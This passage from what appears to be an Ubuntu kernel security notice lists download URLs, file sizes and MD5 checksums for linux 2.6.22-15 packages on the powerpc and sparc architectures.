http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-powerpc-smp_2.6.22-15.16_powerpc.deb
  Size/MD5:     3776 a865c756c85227c4b4c99bcdd3527da4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-powerpc64-smp_2.6.22-15.16_powerpc.deb
  Size/MD5:     3802 aa1096bc346f2f035c958d334b62a6ae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-powerpc_2.6.22-15.16_powerpc.deb
  Size/MD5:     3774 8588158f9ddfb583ab42815497394f5d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/updates-modules-2.6.22-15-powerpc-di_2.6.22-15.16_powerpc.udeb
  Size/MD5:      646 19c2d7fee87ceacc358002a4e1a67367
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/updates-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.16_powerpc.udeb
  Size/MD5:      648 7ef35ae416bf2f80db27596032363462
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   315160 76de8fb0030716726ac881afdf912262
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   331806 945326f8e67dbe67dffca506fe70b68a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   310634 7d32348468e25b6e8161eb1e794dbbc3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    69108 9c0cc6d763c9a26965d95b1016f23366
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    59600 e8ad3dc8e454774b4b48e4d86903b3c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    69124 a9694608ebda5380e1f31c6c6d48a71f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    47626 d4a71e109ab995054184e3880c5f85de
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    41296 3dc951a9e00d2992573df883125c9673
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    47628 ac297004e60d6daac2c5077b4f597af8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   107324 0af8c2548273b734d8d423b27943f1d6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    91162 b7cf64c5781cf1680f0b43984dbb8e8d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   107284 da3d9f2d058a9dd6d41a56fed7e5a166
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    40968 498b97586b06155aab845e21b15c6ffc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    44734 93c489df9c18963cfef25f8d848fd702
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    40978 93a3f89c4bae49dbab525f2244ed90f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   773510 5e3337dc062ce47a23744bab9630dd97
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   709242 e9365b33f36e855d6cfd841d97214e52
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   773420 6faf03e36789cc6bc1aa3296a7d4e07c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   243332 f842b8f9ba469616ea848991916f030a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   236400 b02a1eeca0b26e053f752da0d4541996
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   243298 ddf59a7f8b7e1abb0c16d50e5f7f3c5b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    53772 8d4cdc627ad212f655fa4771909a2631
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    47384 fca7ed43dba57b56d77c0afb5bc36fed
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    53740 8aacab34266a00ac6b864e380f498d23
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    69044 199cb6c932b1c57896e1765bbe4da986
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    62400 a01800fc7c294dd53eaf87f43fbe2330
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    68996 d07d16dc42d5daec47b8f364389d7433
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   166820 95db10ab499ab76aa49ca336ce6c17ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   147482 5d5b81ecf9970e96b48be6eefc8122fa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   166684 ca4a1e06d95a88309fdb93d948b05ae8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   347892 f845d2b1036cf7d96aa1ccc277a7b2ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   385002 bcfa8c06cca8efca21d1661c91890e07
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   347782 d2acb9f168d9403a7f1d6beb3edf80d0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:  3204126 e0449de12be613e0ef6f71b33948a26f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:  2182774 6b34a7331f66cc6360ee518134b31a9e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:  3121074 94b278820db5d9364f3a11332c4bf6f7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-cell_2.6.22-15.54_powerpc.deb
  Size/MD5:   658542 224b256989d50b0babe3e046a8a5acd1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-powerpc-smp_2.6.22-15.54_powerpc.deb
  Size/MD5:   568724 14f0c68ecb1ea96fd589bdf0050c22f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-powerpc64-smp_2.6.22-15.54_powerpc.deb
  Size/MD5:   572426 1f588c7a9f543e235d4c985a13732fe3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-powerpc_2.6.22-15.54_powerpc.deb
  Size/MD5:   568282 ed5c8079a439162c175eca4913cb2dd0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-15-cell_2.6.22-15.54_powerpc.deb
  Size/MD5: 19766842 f303b6b54e23c220d5cfbeac66d4faaf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-15-powerpc-smp_2.6.22-15.54_powerpc.deb
  Size/MD5: 18708820 3bdb75aaaa8961d3f3730976403cb8e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-15-powerpc64-smp_2.6.22-15.54_powerpc.deb
  Size/MD5: 19744780 b9a76ee8362bc970adc9868bcb9b4309
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-15-powerpc_2.6.22-15.54_powerpc.deb
  Size/MD5: 18485548 1b1fd19601cb719bf42fc78ceefcb444
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-15.54_powerpc.deb
  Size/MD5:   629682 790e46628648d1b59b4796a607920d47
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   298656 ae2aae1d23ee9459c3a2c238f62b0c3f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   256442 6b9c9cf85cbf6caf9a904172ab8353bf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   298538 e2e158aa1390c6650dc31f8bc6b666da
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   173322 46bc77ff2c7dfe168a99431aed9543fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   159610 e2562a075799cfd2d38ce8cc4f5b10bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   173266 95e55b6c7f32762abb49f3503aca44ec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   288574 86783294fef9eaecaf0fea407e01378b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   256444 28dcf9ad4907afc1db0cd6ea2da52ce5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   288540 1502f113e0c9f40f3d8a8629467f921a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:  1931854 18199bd1925f2e7f7188ee3826dad7d3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:  1654766 5813c15c304f8e11e7202867d43192b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:  1909850 62c123566de18c9a33a1e06ede984735
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   216076 0b3682996152ba06ac5fd6373aa6d735
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   234448 3531ee385f9be4c3616294f69a7bb210
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   224102 f59d04573e8556fd788db3da5fb78a15
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   181652 31e05543b341fa1fd3a2afc1d83fd1cf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   153868 7f32b2cb52a3ce4ae228efd44597d130
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   181584 c6b132d7e6f8b4dd0bbeccdc03447a6b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   103632 6645c56a57d8b9b5772c8d375b8e6bcd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    86736 3b0b2786ca7aae2e78027ab51eac2be6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   103494 c569c090e64b3ca81508d060826925c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    46978 7e539f3deae48b9bb62b10f8cfba97ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    45402 628c4a5fe3245fcb4cb5c4dfe12a2bdc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    46996 da7e8a7ffdec8578333b4945278bad90
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    54468 9e847dace1f6bb96dd4b2a4a68f0a7bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    41570 6a7226a7fb2a98add60fcabfc5dd65ed
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    47806 2ef913db23ed334fe01c3000f1d3823c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    87004 431473bc1306e9abadea45405d748f8f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    74054 83b8bc0d89a70f616e47bebd2d4ae188
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    86976 ebe28671e620e988936babd9dcaac03a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    30306 444a504fbe3a928fcf975c1c4de6911f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    76260 bcd35555297c4707bfe4998c78cf1aa9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    30332 0ba859f43a4526a51a02dc97e15845c6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:     9952 8f8a952c62200febb47630546ea2f7b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:     8458 44b8f28b718470b9a0f6544edf6e7d78
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:     9948 9be31362b48f63df01f9eb3bae241200
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    68476 5dfcb2d47d20f04ab2fd730cd00d0e92
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    56868 43a9199173d14b60514cce4e26c04e0d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    68450 4d37835af2ccd7767f65bf5b862182f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   131418 2bbffb08183ef9737b1c7ee7d91c860f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    87806 d1f7fb7a127c3bb5ea17a71f1d47d26b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   131240 f3472f484e00531c8d606deb7dedfe65
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:  1432182 11115ebffcd3b842dbbc68f5a3f62b3c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:  1441334 73962d3133f94fb2b761326db53c2167
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:  1432046 5f35cce2c671c79e10b8cd43bea84d4b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    70948 2d8686184d04697c8be62752cae815ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    75508 d9105ae8e009613e616147e76f780b0a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    84768 fd7f0edf50e458f429f1e87f3055f3ff
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    14532 9a3539e3c59fb397abfc9508f5c9578a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    12536 9c5146c46602c9ead4d328871d3f17af
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    14528 73f06b41f5764ed81468e4d89e97dc0c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   558348 5b80e2fb36c8ff6a55f896a5fb7e2e3d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   492732 29b5a718362fe422c612f72c4da114a0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   549300 4dec89e60b7d7b5060c0cc8455c2c9ac
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   105380 ccfd8dc7b67ffe3abde899289adfc200
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:    79662 1b4022ffa935534a726498fce40b4eda
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb
  Size/MD5:   104304 02c6251885f3f373d18446b958c2855f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-cell_2.6.22-15.39_powerpc.deb
  Size/MD5:  2619590 af8281593571ced37b2129ed2342fccd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-powerpc-smp_2.6.22-15.39_powerpc.deb
  Size/MD5:  2567378 20bf3027940d1142ad8803732870f36e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-powerpc64-smp_2.6.22-15.39_powerpc.deb
  Size/MD5:  2620222 8073e56c511e70257e61599e18b5bd5e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-powerpc_2.6.22-15.39_powerpc.deb
  Size/MD5:  2554464 27d7b5e667ec571d53285d4cbac8f203
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/nic-firmware-2.6.22-15-cell-di_2.6.22-15.39_powerpc.udeb
  Size/MD5:  1048390 d4b1ca0b0ab22138ba04d681dc20f0c3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/nic-firmware-2.6.22-15-powerpc-di_2.6.22-15.39_powerpc.udeb
  Size/MD5:  1048432 e45f37ec5193154aa04c35fed50fdaee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/nic-firmware-2.6.22-15-powerpc64-smp-di_2.6.22-15.39_powerpc.udeb
  Size/MD5:  1048558 0c6648aa9377a3ccc64477bf5dd08f38
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-cell-di_2.6.22-15.39_powerpc.udeb
  Size/MD5:   322524 0fdea901bdf7b9173d89d49f10648d0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-powerpc-di_2.6.22-15.39_powerpc.udeb
  Size/MD5:   322536 5a36968fa11e67940cf88dfec8f5b90a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-powerpc64-smp-di_2.6.22-15.39_powerpc.udeb
  Size/MD5:   322560 63ec46beb37b44f7e901d4a17d4d5002
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-cell-di_2.6.22-15.39_powerpc.udeb
  Size/MD5:   267156 690a55e73215d9bc450caa6b99fc4476
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-powerpc-di_2.6.22-15.39_powerpc.udeb
  Size/MD5:   220186 7710f01beebe09e0c9bf2cb812991139
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.39_powerpc.udeb
  Size/MD5:   267210 651e58dc6fce70139c603386c92ff3bb
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-powerpc-smp_2.6.22.4-15.11_powerpc.deb
  Size/MD5:  1300508 45e687319d4e0d2dac393138e6f2d6c6
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-powerpc64-smp_2.6.22.4-15.11_powerpc.deb
  Size/MD5:  1002304 9f77a9427eeaea48276c6b68547d824f
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-powerpc_2.6.22.4-15.11_powerpc.deb
  Size/MD5:  1298454 fc0dcab1f9958209c7f4266bc08de844
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nic-restricted-firmware-2.6.22-15-powerpc-di_2.6.22.4-15.11_powerpc.udeb
  Size/MD5:      764 d6233f778dcf936a4a0478aa80409d52
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nic-restricted-modules-2.6.22-15-powerpc-di_2.6.22.4-15.11_powerpc.udeb
  Size/MD5:      734 8505f5c770efe7e12619fc324996c31a

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-sparc64-smp_2.6.22-15.16_sparc.deb
  Size/MD5:     3802 e09e7173876354b9a1bb6846e9437b67
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-sparc64_2.6.22-15.16_sparc.deb
  Size/MD5:     3772 586b2c371ca1f45ea3513cfa459fa08a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/updates-modules-2.6.22-15-sparc64-di_2.6.22-15.16_sparc.udeb
  Size/MD5:      646 049e8815ed4659bbd756521f44d1b957
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:    59312 4c07f24b58ed97db0fb543db5a8d4856
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:    68268 a62b0e675c367386a3208a198f127949
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:    42130 4b939c9f08fee124425bd784f7bf7d3a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:    95330 eb40ad8d594615e788ecf89c529c1561
